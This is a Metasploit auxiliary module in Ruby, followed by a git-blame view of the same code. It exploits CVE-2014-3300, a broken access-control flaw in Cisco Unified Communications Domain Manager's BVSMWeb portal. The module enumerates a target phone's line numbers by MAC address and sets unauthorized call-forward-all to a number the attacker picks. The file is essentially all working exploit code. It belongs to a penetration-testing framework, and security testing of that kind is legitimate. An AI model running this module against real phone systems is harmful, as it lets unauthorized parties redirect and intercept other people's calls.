modules/auxiliary/voip/cisco_cucdm_call_forward.rb

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'rexml/document'

class MetasploitModule < Msf::Auxiliary
  include Msf::Exploit::Remote::HttpClient

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Viproy CUCDM IP Phone XML Services - Call Forwarding Tool',
        'Description' => %q{
          The BVSMWeb portal in the web framework in Cisco Unified Communications Domain Manager
          (CDM) 10 does not properly implement access control, which allows remote attackers to
          modify user information. This module exploits the vulnerability to configure unauthorized
          call forwarding.
        },
        'Author' => 'fozavci',
        'References' => [
          ['CVE', '2014-3300'],
          ['BID', '68331']
        ],
        'License' => MSF_LICENSE,
        'Actions' => [
          [ 'Forward', { 'Description' => 'Enabling the call forwarding for the MAC address' } ],
          [ 'Info', { 'Description' => 'Retrieving the call forwarding information for the MAC address' } ]
        ],
        'DefaultAction' => 'Info',
        'Notes' => {
          'Stability' => [SERVICE_RESOURCE_LOSS],
          'SideEffects' => [IOC_IN_LOGS],
          'Reliability' => []
        }
      )
    )

    register_options(
      [
        OptString.new('TARGETURI', [ true, 'Target URI for XML services', '/bvsmweb']),
        OptString.new('MAC', [ true, 'MAC address of target phone', '000000000000']),
        OptString.new('FORWARDTO', [ true, 'Number to forward all calls', '007']),
        OptString.new('FINTNUMBER', [ false, 'FINTNUMBER of IP phones, required for multiple lines'])
      ]
    )
  end

  def run
    case action.name.upcase
    when 'INFO'
      get_info
    when 'FORWARD'
      forward_calls
    end
  end

  def get_info
    uri = normalize_uri(target_uri.to_s)
    mac = datastore['MAC']

    print_status('Getting fintnumbers and display names of the IP phone')

    res = send_request_cgi(
      {
        'uri' => normalize_uri(uri, 'showcallfwd.cgi'),
        'method' => 'GET',
        'vars_get' => {
          'device' => "SEP#{mac}"
        }
      }
    )

    unless res && res.code == 200 && res.body && res.body.to_s =~ /fintnumber/
      print_error('Target appears not vulnerable!')
      print_status(res.to_s)
      return []
    end

    doc = REXML::Document.new(res.body)
    lines = []
    fint_numbers = []

    list = doc.root.get_elements('MenuItem')

    list.each do |lst|
      xlist = lst.get_elements('Name')
      xlist.each { |l| lines << (l[0]).to_s }
      xlist = lst.get_elements('URL')
      xlist.each { |l| fint_numbers << (l[0].to_s.split('fintnumber=')[1]).to_s }
    end

    lines.size.times do |i|
      print_status("Display Name: #{lines[i]}, Fintnumber: #{fint_numbers[i]}")
    end

    fint_numbers
  end

  def forward_calls
    # for a specific FINTNUMBER redirection
    uri = normalize_uri(target_uri.to_s)
    forward_to = datastore['FORWARDTO']
    mac = datastore['MAC']

    if datastore['FINTNUMBER']
      fint_numbers = [datastore['FINTNUMBER']]
    else
      fint_numbers = get_info
    end

    if fint_numbers.empty?
      print_error('FINTNUMBER required to forward calls')
      return
    end

    fint_numbers.each do |fintnumber|
      print_status("Sending call forward request for #{fintnumber}")

      send_request_cgi(
        {
          'uri' => normalize_uri(uri, 'phonecallfwd.cgi'),
          'method' => 'GET',
          'vars_get' => {
            'cfoption' => 'CallForwardAll',
            'device' => "SEP#{mac}",
            'ProviderName' => 'NULL',
            'fintnumber' => fintnumber.to_s,
            'telno1' => forward_to.to_s
          }
        }
      )

      res = send_request_cgi(
        {
          'uri' => normalize_uri(uri, 'showcallfwdperline.cgi'),
          'method' => 'GET',
          'vars_get' => {
            'device' => "SEP#{mac}",
            'fintnumber' => fintnumber.to_s
          }
        }
      )

      if res && res.body.to_s.include?('CFA')
        print_good("Call forwarded successfully for #{fintnumber}")
      else
        print_error('Call forward failed')
      end
    end
  end
end
Viproy VoIP Pen-Test Kit - Cisco CUCDM Exploits 2014-10-24 11:46:52 +11:00			`##`
use https for metaploit.com links 2017-07-24 06:26:21 -07:00			`# This module requires Metasploit: https://metasploit.com/download`
Viproy VoIP Pen-Test Kit - Cisco CUCDM Exploits 2014-10-24 11:46:52 +11:00			`# Current source: https://github.com/rapid7/metasploit-framework`
			`##`

			`require 'rexml/document'`

use MetasploitModule as a class name 2016-03-08 14:02:44 +01:00			`class MetasploitModule < Msf::Auxiliary`
Viproy VoIP Pen-Test Kit - Cisco CUCDM Exploits 2014-10-24 11:46:52 +11:00			`include Msf::Exploit::Remote::HttpClient`

modules/auxiliary/voip: Resolve RuboCop violations 2025-05-07 00:47:05 +10:00			`def initialize(info = {})`
			`super(`
			`update_info(`
			`info,`
			`'Name' => 'Viproy CUCDM IP Phone XML Services - Call Forwarding Tool',`
			`'Description' => %q{`
			`The BVSMWeb portal in the web framework in Cisco Unified Communications Domain Manager`
			`(CDM) 10 does not properly implement access control, which allows remote attackers to`
			`modify user information. This module exploits the vulnerability to configure unauthorized`
			`call forwarding.`
			`},`
			`'Author' => 'fozavci',`
			`'References' => [`
Do First callforward cleanup 2015-01-10 00:00:27 -06:00			`['CVE', '2014-3300'],`
			`['BID', '68331']`
			`],`
modules/auxiliary/voip: Resolve RuboCop violations 2025-05-07 00:47:05 +10:00			`'License' => MSF_LICENSE,`
			`'Actions' => [`
Beautify description 2015-01-10 00:02:42 -06:00			`[ 'Forward', { 'Description' => 'Enabling the call forwarding for the MAC address' } ],`
			`[ 'Info', { 'Description' => 'Retrieving the call forwarding information for the MAC address' } ]`
Do First callforward cleanup 2015-01-10 00:00:27 -06:00			`],`
modules/auxiliary/voip: Resolve RuboCop violations 2025-05-07 00:47:05 +10:00			`'DefaultAction' => 'Info',`
			`'Notes' => {`
			`'Stability' => [SERVICE_RESOURCE_LOSS],`
			`'SideEffects' => [IOC_IN_LOGS],`
			`'Reliability' => []`
			`}`
			`)`
			`)`
Viproy VoIP Pen-Test Kit - Cisco CUCDM Exploits 2014-10-24 11:46:52 +11:00
			`register_options(`
Do First callforward cleanup 2015-01-10 00:00:27 -06:00			`[`
			`OptString.new('TARGETURI', [ true, 'Target URI for XML services', '/bvsmweb']),`
modules/auxiliary/voip: Resolve RuboCop violations 2025-05-07 00:47:05 +10:00			`OptString.new('MAC', [ true, 'MAC address of target phone', '000000000000']),`
Do First callforward cleanup 2015-01-10 00:00:27 -06:00			`OptString.new('FORWARDTO', [ true, 'Number to forward all calls', '007']),`
modules/auxiliary/voip: Resolve RuboCop violations 2025-05-07 00:47:05 +10:00			`OptString.new('FINTNUMBER', [ false, 'FINTNUMBER of IP phones, required for multiple lines'])`
			`]`
			`)`
Viproy VoIP Pen-Test Kit - Cisco CUCDM Exploits 2014-10-24 11:46:52 +11:00			`end`

			`def run`
Refactor cisco_cucdm_callforward 2015-01-10 00:27:31 -06:00			`case action.name.upcase`
			`when 'INFO'`
			`get_info`
			`when 'FORWARD'`
			`forward_calls`
			`end`
			`end`

			`def get_info`
Viproy VoIP Pen-Test Kit - Cisco CUCDM Exploits 2014-10-24 11:46:52 +11:00			`uri = normalize_uri(target_uri.to_s)`
modules/auxiliary/voip: Resolve RuboCop violations 2025-05-07 00:47:05 +10:00			`mac = datastore['MAC']`
Viproy VoIP Pen-Test Kit - Cisco CUCDM Exploits 2014-10-24 11:46:52 +11:00
modules/auxiliary/voip: Resolve RuboCop violations 2025-05-07 00:47:05 +10:00			`print_status('Getting fintnumbers and display names of the IP phone')`
Viproy VoIP Pen-Test Kit - Cisco CUCDM Exploits 2014-10-24 11:46:52 +11:00
			`res = send_request_cgi(`
modules/auxiliary/voip: Resolve RuboCop violations 2025-05-07 00:47:05 +10:00			`{`
			`'uri' => normalize_uri(uri, 'showcallfwd.cgi'),`
			`'method' => 'GET',`
			`'vars_get' => {`
			`'device' => "SEP#{mac}"`
			`}`
			`}`
			`)`
Viproy VoIP Pen-Test Kit - Cisco CUCDM Exploits 2014-10-24 11:46:52 +11:00
Do First callforward cleanup 2015-01-10 00:00:27 -06:00			`unless res && res.code == 200 && res.body && res.body.to_s =~ /fintnumber/`
modules/auxiliary/voip: Resolve RuboCop violations 2025-05-07 00:47:05 +10:00			`print_error('Target appears not vulnerable!')`
			`print_status(res.to_s)`
Refactor cisco_cucdm_callforward 2015-01-10 00:27:31 -06:00			`return []`
Do First callforward cleanup 2015-01-10 00:00:27 -06:00			`end`

			`doc = REXML::Document.new(res.body)`
			`lines = []`
			`fint_numbers = []`
Viproy VoIP Pen-Test Kit - Cisco CUCDM Exploits 2014-10-24 11:46:52 +11:00
Do First callforward cleanup 2015-01-10 00:00:27 -06:00			`list = doc.root.get_elements('MenuItem')`
Viproy VoIP Pen-Test Kit - Cisco CUCDM Exploits 2014-10-24 11:46:52 +11:00
Do First callforward cleanup 2015-01-10 00:00:27 -06:00			`list.each do \|lst\|`
			`xlist = lst.get_elements('Name')`
modules/auxiliary/voip: Resolve RuboCop violations 2025-05-07 00:47:05 +10:00			`xlist.each { \|l\| lines << (l[0]).to_s }`
Do First callforward cleanup 2015-01-10 00:00:27 -06:00			`xlist = lst.get_elements('URL')`
modules/auxiliary/voip: Resolve RuboCop violations 2025-05-07 00:47:05 +10:00			`xlist.each { \|l\| fint_numbers << (l[0].to_s.split('fintnumber=')[1]).to_s }`
Do First callforward cleanup 2015-01-10 00:00:27 -06:00			`end`
Viproy VoIP Pen-Test Kit - Cisco CUCDM Exploits 2014-10-24 11:46:52 +11:00
Do First callforward cleanup 2015-01-10 00:00:27 -06:00			`lines.size.times do \|i\|`
Do the same for aux modules 2016-02-01 16:06:34 -06:00			`print_status("Display Name: #{lines[i]}, Fintnumber: #{fint_numbers[i]}")`
Do First callforward cleanup 2015-01-10 00:00:27 -06:00			`end`
Viproy VoIP Pen-Test Kit - Cisco CUCDM Exploits 2014-10-24 11:46:52 +11:00
Refactor cisco_cucdm_callforward 2015-01-10 00:27:31 -06:00			`fint_numbers`
			`end`

			`def forward_calls`
Do First callforward cleanup 2015-01-10 00:00:27 -06:00			`# for a specific FINTNUMBER redirection`
Refactor cisco_cucdm_callforward 2015-01-10 00:27:31 -06:00			`uri = normalize_uri(target_uri.to_s)`
modules/auxiliary/voip: Resolve RuboCop violations 2025-05-07 00:47:05 +10:00			`forward_to = datastore['FORWARDTO']`
			`mac = datastore['MAC']`
Refactor cisco_cucdm_callforward 2015-01-10 00:27:31 -06:00
			`if datastore['FINTNUMBER']`
			`fint_numbers = [datastore['FINTNUMBER']]`
			`else`
			`fint_numbers = get_info`
			`end`

			`if fint_numbers.empty?`
modules/auxiliary/voip: Resolve RuboCop violations 2025-05-07 00:47:05 +10:00			`print_error('FINTNUMBER required to forward calls')`
Refactor cisco_cucdm_callforward 2015-01-10 00:27:31 -06:00			`return`
			`end`
Viproy VoIP Pen-Test Kit - Cisco CUCDM Exploits 2014-10-24 11:46:52 +11:00
Refactor cisco_cucdm_callforward 2015-01-10 00:27:31 -06:00			`fint_numbers.each do \|fintnumber\|`
Do the same for aux modules 2016-02-01 16:06:34 -06:00			`print_status("Sending call forward request for #{fintnumber}")`
Viproy VoIP Pen-Test Kit - Cisco CUCDM Exploits 2014-10-24 11:46:52 +11:00
Refactor cisco_cucdm_callforward 2015-01-10 00:27:31 -06:00			`send_request_cgi(`
modules/auxiliary/voip: Resolve RuboCop violations 2025-05-07 00:47:05 +10:00			`{`
			`'uri' => normalize_uri(uri, 'phonecallfwd.cgi'),`
			`'method' => 'GET',`
			`'vars_get' => {`
			`'cfoption' => 'CallForwardAll',`
			`'device' => "SEP#{mac}",`
			`'ProviderName' => 'NULL',`
			`'fintnumber' => fintnumber.to_s,`
			`'telno1' => forward_to.to_s`
			`}`
			`}`
			`)`
Do First callforward cleanup 2015-01-10 00:00:27 -06:00
Refactor cisco_cucdm_callforward 2015-01-10 00:27:31 -06:00			`res = send_request_cgi(`
modules/auxiliary/voip: Resolve RuboCop violations 2025-05-07 00:47:05 +10:00			`{`
			`'uri' => normalize_uri(uri, 'showcallfwdperline.cgi'),`
			`'method' => 'GET',`
			`'vars_get' => {`
			`'device' => "SEP#{mac}",`
			`'fintnumber' => fintnumber.to_s`
			`}`
			`}`
			`)`

			`if res && res.body.to_s.include?('CFA')`
Do the same for aux modules 2016-02-01 16:06:34 -06:00			`print_good("Call forwarded successfully for #{fintnumber}")`
Refactor cisco_cucdm_callforward 2015-01-10 00:27:31 -06:00			`else`
modules/auxiliary/voip: Resolve RuboCop violations 2025-05-07 00:47:05 +10:00			`print_error('Call forward failed')`
Viproy VoIP Pen-Test Kit - Cisco CUCDM Exploits 2014-10-24 11:46:52 +11:00			`end`
			`end`
			`end`
			`end`